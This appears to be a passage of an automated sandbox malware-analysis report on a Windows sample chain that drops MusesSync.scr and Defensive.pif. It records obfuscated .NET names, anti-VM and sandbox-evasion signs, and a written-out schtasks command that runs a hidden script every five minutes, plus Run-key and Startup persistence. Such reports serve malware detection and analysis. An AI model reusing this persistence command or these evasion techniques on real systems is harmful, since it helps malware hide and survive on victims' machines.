                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, MHKavlaArpogoTn6ENC.csHigh entropy of concatenated method names: 'y6Pa1mIVlR', 'H1vaIVGhru', 'Lsti3oJMlBMgLbey8rn', 'GsT4ErJZoIgEy1OhCfY', 'l6TWAvJtKcHpYY0IcdC', 'W3fbkOJXcLetFeJMpxu', 'p2SqZOJOSaxU9PSjU2U', 'NwMe5EJqFX8FwRWdMNo', 'lTAxbXJpawAJhgopZFv', 'jS7GfVJA4D6Uh35FNxp'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, tAtyuCaOFcrCARykwbk.csHigh entropy of concatenated method names: 'P2lapYSu20', 'oDXl5EsIgVOCjZ15yuJ', 'KIF038sLyKPs8KQPdN6', 'fXde9esehStfl3DyXxm', 'xvRAhcsoqKwNLgFu0Da', 'vKwqlEsDAbA6iCOSmyu', 'rscI59svhGgvw5whCNB', 'q5osAkskvJPxiAu8eYW', 'vsPiujsdCpFwgUPE6Qx', 'A5XfdFsW93wyYPTPbSW'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, rNubtSV5TNhXAWXHxbx.csHigh entropy of concatenated method names: 'TD7OLPOt2o', 'kIIMpWu1mbXQ0dW0OFc', 'CfkYVcuIKLvYL9XgLFc', 'QihNyLuLU1X4h1mGMqw', 'etnXA5ueKFDKujeFMHI', 'VNoFccuoYQMDJ0h4PxD', 'I2UvCtuAmGIj72Ogg9I', 'WuC1uQuBwLsu4DpwXof', 'qqmH2tuDso3YPIJaEjJ', 'BWpLgpuvBTLiH4JEH4Z'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, PENxH5VaZfHwJPQ1jrx.csHigh entropy of concatenated method names: 'D1cVwZdryc', 'bh7ViKhThu', 'IbaVVWaRF1', 'qERVnjekiP', 'r3atyf2I4UiDN6ks1y3', 'uXutYk2LmXvp6CQO3qc', 'xIY5n12BohTUsXUv8jq', 'rGZZxC216WmaqR0hgoy', 'w4laUd2emqoYwgb3ggH', 'coA7mc2olNEUL1nVIPL'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, OdgloGaKP1kJq7MZ1sC.csHigh entropy of concatenated method names: 'GmEa7NxjL8', 'dgLamOnxFF', 'bPKagGeJlY', 'Ub8aCva2aX', 'zd6a5sgnqV', 'U69ahbLg9u', 'sQTab0VrBv', 'mfZyGd6gbs5OiNWZWBH', 'QYvlAf6CYpTu0weLqBe', 'gV2cUJ65SyQJIKQXCSb'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, BtACuaGyCkXnLF01jDd.csHigh entropy of concatenated method names: 'DtkGY2aaPm', 'GPGGPjZviI', 'B85Z9fTnBxDptgIgIAy', 'X5QwMrTjqmVUjiMWBB8', 'w4smllTcsTuuhJfnO7w', 'pko1ohTfh9ouP9JM69T', 'dDXbC1T3EkWXHuKtUX3', 'lWiYqBT8oDEhbE4ji9B', 'bgbGBQTijuwuMQFkHa0', 'IL3WCQTVd4QN3t7pJBe'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, NvkBoQGkFBUq8h0x6rL.csHigh entropy of concatenated method names: 'KMTGWD4owx', 'MsY0APbDAN55G8MZrw6', 'kSR5JDbvKteW1SBlYAr', 'm2wnwhbkylLN1AFnP66', 'GEEf9lbdlZ2cZ3NPdo6', 'ABHO7ObWwPf8E4e4VIq', 'HFiCiWbyR3OZAGhTkRS', 'ayiDaObSXNRf772cy6g', 'OLQjQqbYpopJ5OTbqtZ', 'T5nd0mbP5yal6UYGb69'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, Xt62Ou8QRJ91TKvyIk.csHigh entropy of concatenated method names: 'b6C7IqDXT', 'LNhmE11C3', 'Y1VCaPfYZ', 'RAL59dhpn', 'rRMbFeakn', 'kirTVVuXq', 'yS4HvAFcD', 'yLJqQeCn4yd8gnEuHgV', 'T2QBAnCjBQPUgjxmiYL', 'jpEo1uCcxxQGLZjYPA3'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, tjUPySGxGrGAwkSEDKe.csHigh entropy of concatenated method names: 'bqUG1LQNXe', 'Bi3GIva9S1', 'kbCGZP3KKM', 'vsDGtZHFsA', 'rcvGXFFbnR', 'be3GOdZGPL', 'V9eGqpox57', 'wLqGpflSh0', 'qnQGAMeYvL', 'KZVGBH8OUb'

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifFile created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406128 ShellExecuteW,URLDownloadToFileW,4_2_00406128
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifFile created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ywezrgl.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00419BC4
                    Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QuickTextPasteJump to behavior
                    Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QuickTextPasteJump to behavior
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0021231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,23_2_0021231B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0019FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,23_2_0019FC88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041BCE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040E54F Sleep,ExitProcess,4_2_0040E54F
                    Found API chain indicative of sandbox detection
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 51F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 51F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094DF910 rdtsc 2_2_094DF910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_004198C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 369000Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 4345Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 5440Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3776Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5761Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 1755Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifWindow / User API: threadDelayed 1185
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifWindow / User API: foregroundWindowGot 1119
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.3 %
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrAPI coverage: 4.2 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6540Thread sleep count: 4345 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59874s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6540Thread sleep count: 5440 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59212s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58999s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58667s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58343s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58234s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58124s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58015s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57905s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57796s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57466s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -56921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -56782s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -56656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4668Thread sleep time: -369000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59659s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59406s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59291s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59187s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -59077s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58969s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58843s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58406s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58276s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -58031s >= -30000sJump to behavior
